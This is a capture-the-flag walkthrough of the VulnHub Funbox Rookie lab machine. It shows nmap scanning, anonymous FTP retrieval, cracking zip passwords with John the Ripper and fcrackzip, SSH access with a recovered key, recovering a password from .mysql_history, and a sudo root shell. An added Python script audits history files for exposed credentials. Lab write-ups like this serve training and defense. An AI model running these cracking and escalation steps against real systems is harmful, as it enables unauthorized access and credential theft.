https://www.vulnhub.com/entry/funbox-rookie,520/

Discovering Target IP

  • sudo nmap -sn 192.168.122.0-255
  • sudo netdiscover -P -i eth0 -r 192.168.122.1/24

Scan Ports

  • nmap -p- 192.168.122.58 to scan all ports and find the open ones
  • nmap -p 21,22,80 -sC -sV 192.168.122.58 to get more information on those open ports

Port 80

Port 21

  • ftp 192.168.122.58 to access the FTP server. The nmap scan shows that anonymous login is allowed, so we can log in with username anonymous and an empty password
  • once we are in the FTP server, ls -la to show all files
  • get <filename> to download one of the files
  • mget * to download multiple or all files
  • exit to leave the FTP server

Cracking ZIP files

  • we now have many zip files, but all of them are password protected.

we can try to use John the Ripper to crack it

  • zip2john tom.zip > tom.txt will convert the zip into a hash file
  • john tom.txt will be able to crack it using the default wordlist
  • unzip tom.zip -d tom and enter the password iubire to unzip it

or we can try to use Fast Zip password cracker

  • gzip -d /usr/share/wordlists/rockyou.txt.gz to decompress the password list
  • fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt cathrine.zip to crack it using the Rockyou password list
  • unzip cathrine.zip -d catherine

Port 22

  • ssh tom@192.168.122.58 -i id_rsa to SSH into the target machine as tom

Get out of rbash

Get user password

  • Now we are in tom's home directory. List the files with ls -la, and there is a hidden .mysql_history file.
  • open it and there is a line insert\040into\040support\040(tom,\040xx11yy22!); from (tom,\040xx11yy22!) we can probably guess that tom is the username and \040xx11yy22! is the password. \040 is the octal escape for the ASCII space character, so tom’s password is xx11yy22!
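
The \040 decoding above can be turned into an audit check for credentials left behind in client history files. This is an added example, not part of the original walkthrough; it assumes the libedit vis(3)-style encoding (octal escapes, doubled backslashes, a _HiStOrY_V2_ marker line), and the SUSPECT patterns and sample input are constructed for illustration.

```python
import re

# Assumption: the mysql client was built against libedit, which saves
# history in vis(3) style: a space becomes \040, a literal backslash is
# doubled, and the first line of the file is a format marker.
# Only those two escape forms are decoded here.
_ESCAPE = re.compile(rb"\\([0-3][0-7]{2}|\\)")
HEADER = "_HiStOrY_V2_"

# Constructed heuristics for statements that tend to carry secrets.
SUSPECT = re.compile(
    r"identified\s+by|password\s*\(|set\s+password|insert\s+into|values\s*\(",
    re.IGNORECASE,
)


def decode_line(line: str) -> str:
    """Turn one escaped history line back into the statement as typed."""
    def repl(m):
        tok = m.group(1)
        return b"\\" if tok == b"\\" else bytes([int(tok, 8)])
    data = _ESCAPE.sub(repl, line.rstrip("\n").encode("utf-8"))
    return data.decode("utf-8", "replace")


def audit_history(text: str):
    """Return (line_number, decoded_statement) for lines worth reviewing."""
    findings = []
    for n, raw in enumerate(text.splitlines(), start=1):
        if raw.strip() == HEADER or not raw.strip():
            continue
        stmt = decode_line(raw)
        if SUSPECT.search(stmt):
            findings.append((n, stmt))
    return findings


# Constructed sample; the insert line is the one quoted in the walkthrough.
SAMPLE = "\n".join([
    "_HiStOrY_V2_",
    r"show\040databases;",
    r"insert\040into\040support\040(tom,\040xx11yy22!);",
    r"quit",
])

if __name__ == "__main__":
    for n, stmt in audit_history(SAMPLE):
        print(f"line {n}: {stmt}")
```

Any line it reports means the value should be treated as exposed: rotate it and clear or disable the history file.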

Elevate Privileges

  • now with tom’s username and password, run sudo -l to list all commands that tom can run with sudo; it shows
User root may run the following commands on funbox2:
    (ALL : ALL) ALL
  • so we can just run sudo bash to open a root shell

Capture the Flag

  • navigate to /root
  • get flag.txt